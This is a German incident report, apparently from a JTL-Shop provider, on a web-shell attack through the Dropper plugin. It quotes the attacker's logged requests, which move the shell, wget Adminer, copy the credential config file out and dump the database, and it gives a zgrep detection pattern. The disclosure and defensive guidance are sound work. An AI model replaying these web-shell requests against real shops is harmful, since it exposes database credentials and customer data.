Wie wurde der Angriff durchgeführt?
Nach der Auswertung einiger Log-Files von uns und anderen Kunden können wir folgende Angriffe feststellen:
01.03., 07.03., 20.03.
Bei einigen Shops konnten wir beobachten wie zu diesen Zeiträumen scheinbar automatisiert eine
GET
und eine
POST
Anfrage gegen
<shop-url>/Kontakt
gemacht wurde. Diese Anfragen kamen von den
IPs
82.102.18.147
und
82.102.18.143. Wir vermuten das hiermit automatisiert geprüft wurde ob es sich
um einen JTL-Shop handelt, bzw. ob dieser Online ist.
GET /Kontakt
POST /Kontakt
09.03. - gegen 19:00 Uhr
Bei einigen (aber nicht allen) Shops wurde an diesem Datum ein erster Angriffsversuch gestartet.
Die Angriffe stammten alle von der IP
82.102.18.14. Hierbei wurde eine Lücke in
Dropper ausgenutzt um die Datei
check.php
hochzuladen. Diese Datei erlaubt die Ausführung von
remote Kommandos auf dem Server. Dann wurde die
check.php
Datei umbenannt in einen dynamischen Namen,
z.B.
zdcfc4ceb34.php. Daraufhin wurde die nun umbenannte
check.php
verwendet um das Datenbanktool
adminer
von der Adresse
https://www.adminer.org/latest.php
herunterzuladen - wiederrum in einer
kryptisch bennannten Datei, z.B.
yd7cdf8c21424.php. Daraufhin wurde die umbenannte
check.php
Datei
verwendet um eine Kopie der
config.JTL-Shop.ini.php
unter dem Namen
c.txt
zu speichern. Daraufhin
wurde die
c.txt
heruntergeladen, wodurch der Angreifer den Inhalt der
config.JTL-Shop.ini.php
kennt.
Am Ende wurde die umbenannte
check.php
verwendet um die
c.txt
wieder zu löschen.
[ Ausnutzen der Dropper Lücke - Log versteckt um keine Nachahmer anzuziehen ]
GET /bilder/kk_dropper_uploads/check.php?q=mv check.php ../zdcfc4ceb34.php
GET /bilder/zdcfc4ceb34.php?q=wget https://www.adminer.org/latest.php -O yd7cdf8c21424.php
GET /bilder/zdcfc4ceb34.php?q=cp ../includes/config.JTL-Shop.ini.php c.txt
GET /bilder/c.txt
GET /bilder/zdcfc4ceb34.php?q=rm c.txt
11.03. - gegen 02:00 Uhr bzw. gegen 12:00 Uhr
Die meisten Shops (auch jene die bereits am 09.03. angegriffen wurden) sind an diesem Datum attackiert worden.
Der Angriff stammt in allen uns bekannten Fällen von der IP
82.102.18.12.
Das Vorgehen hat sich im Vergleich zum Angriff vom
09.03.
nochmals geändert:
Bei bereits am
09.03.
angegriffenen Shops wurden die am
09.03.
erstellten PHP Dateien zunächst gelöscht:
GET /bilder/zdcfc4ceb34.php?rm=yd7cdf8c21424.php
GET /bilder/zdcfc4ceb34.php?rm=zdcfc4ceb34.php
Draufhin wurde eine Lücke in Dropper ausgenutzt um die Dateien
check.php
und
checka.php
hochzuladen.
Die
check.php
erlaubt die Ausführung von remote Kommandos auf dem Server, währenddessen die
checka.php
Datei das
Datenbanktool
Adminer
enthällt. Daraufhin wurde mittels der
check.php
das Verzeichnis
/downloads/vorschau
erstellt.
Dann wurden
checka.php
und
check.php
mittels
check.php
in den Ordner
/downloads/vorschau
unter kryptischem Namen verschoben,
z.B.
checka.php
nach
/downloads/vorschau/y7c6f79e49a75.php
und dann
check.php
nach
/downloads/vorschau/z2104c3adf9.php.
Daraufhin wurde die umbenannte
check.php
Datei verwendet um eine Kopie der
config.JTL-Shop.ini.php
unter dem Namen
c.txt
zu speichern.
Daraufhin wurde die
c.txt
heruntergeladen, wodurch der Angreifer den Inhalt der
config.JTL-Shop.ini.php
kennt. Am Ende wurde die umbenannte
check.php
verwendet um evtl. vorhandene
check.php
und
checka.php
aus dem
/bilder/kk_dropper_uploads
Ordner zu löschen.
[ Ausnutzen der Dropper Lücke - Log versteckt um keine Nachahmer anzuziehen ]
GET /bilder/kk_dropper_uploads/check.php?mk=../../downloads/vorschau
GET /bilder/kk_dropper_uploads/check.php?mv=checka.php&mv2=../../downloads/vorschau/y7c6f79e49a75.php
GET /bilder/kk_dropper_uploads/check.php?mv=check.php&mv2=../../downloads/vorschau/z2104c3adf9.php
GET /downloads/vorschau/z2104c3adf9.php?cp=../../includes/config.JTL-Shop.ini.php&cp2=c.txt
GET /downloads/vorschau/c.txt
GET /bilder/kk_dropper_uploads/check.php?rm=[WEB_ROOT]/bilder/kk_dropper_uploads/check.php
GET /bilder/kk_dropper_uploads/check.php?rm=[WEB_ROOT]/bilder/kk_dropper_uploads/checka.php
11.03. - gegen 13:30 Uhr
In den Logs der meisten Shops konnten wir feststellen wie der Angreifer gegen 13:30 Uhr versucht hat mit der umbenannten
check.php
Datei die
c.txt
wieder zu löschen - vermutlich um seine Spuren zu verwischen.
GET /downloads/vorschau/z2104c3adf9.php?rm=c.txt
Weiteres Vorgehen des Angreifers
Nach der vorherigen Angriffswelle besitzt der Angreifer nun die Datenbank Zugangsdaten zum Shop, sowie die Möglichkeit sich per Adminer Tool mit der Datenbank zu verbinden. Wir konnten in unserem eigenen Shop feststellen, wie er den Adminer benutzt um zuerst in einige Datenbanktabellen zu schauen, und dann am Ende die Datenbank exportiert (dump).
Das Exportieren der Datenbank sieht in unserem Log in etwa so aus (Begriffe in eckigen Klammern wurden durch Platzhalter ersetzt):
POST /downloads/vorschau/y7c6f79e49a75.php?server=[db-server-ip]&username=[db-user]&db=[db]&dump=
Festellen ob die Shop Datenbank ausgespäht wurde
Der Angreifer hat ein PHP Script hochgeladen, welches das PHP Tool Adminer enthält. Dieses Tool kann der Angreifer benutzen um deine Datenbank auszuspähen und zu kopieren.
Solltest du Zugang zu den Log-Dateien des betroffenen Servers haben, empfehlen wir dir folgende Befehle auf deinem Server auszuführen um festzustellen ob der Angreifer sich via Adminer Zugriff zu deiner Datenbank verschafft hat.
Wichtig! Stelle vorher sicher dass die Logs für den Zeitraum des Angriffs (09.03 - heute) vorliegen, falls nicht ist die Ausgabe der folgenden Befehle nicht aussagekräftig.
# Wechsel in das Verzeichnis in dem sich die access logs deines
# Servers befinden, oft ist das /var/logs/apache2 oder /var/log/nginx
cd /verzeichnis/zu/access/logs
# Durchsuche die Logs nach Spuren eines Zugriffs auf Adminer, also
# auf die Stichwörter "&dump=" oder ".php?server=" oder "&version=4.7.1"
zgrep '&dump=\|.php?server=\|&version=4.7.1' *access*.*
Sollte dieses Kommando keine Einträge zurückgeben, könnte das ein Hinweis darauf sein, dass der Angreifer den Adminer bisher nicht auf deinem Server ausgeführt hat und deine Datenbank noch nicht abgezogen wurde. Das war bis auf wenige Ausnahmen aller von uns durchsuchten Logs glücklicherweise der Fall.
Festellen ob der Angreifer sich extern Zugriff auf deinen Datenbank Server verschafft hat
Sollte dein Server befallen sein, kennt der Angreifer in jedem Fall den Datenbank-Benutzer und Kennwort des Shops,
da er den Inhalt der Shop Konfigurationsdatei
[shop-root]/includes/config.JTL-Shop.ini.php
gelesen hat.
Dein Server Administrator sollte prüfen ob der Datenbank Server des Shops über das Internet erreichbar ist. Sollte das tatsächlich der Fall sein, musst du davon ausgehen dass deine Datenbank ausgespäht wurde.
Meine Datenbank wurde vielleicht ausgespäht, was nun?
Die primären Kundendaten befinden sich in der Tabelle
tKunde, diese enthält unverschlüsselt für jeden Kunden:
- Vorname
- Adressdaten
- Telefonummer
- Emailadresse
Weitere sensible Daten in dieser Tabelle (Nachname des Kunden) sind verschlüsselt. Allerdings konnte der Angreifer auch den Blowfish-Key
aus der
config.JTL-Shop.ini.php
ausspähen, womit er diese Daten entschlüsseln kann.
Passwörter der Kunden sind vermutlich nicht betroffen, da diese nur gehasht in der Datenbank abgelegt werden.
Sensible Zahlungsdaten (z.B. CV Codes für Kredit, Logindaten Paypal) werden nicht in der Datenbank gehalten.
Allerdings schreiben einige Zahlungsanbieter Informationen in die Datenbanktabelle
tzahlungslog.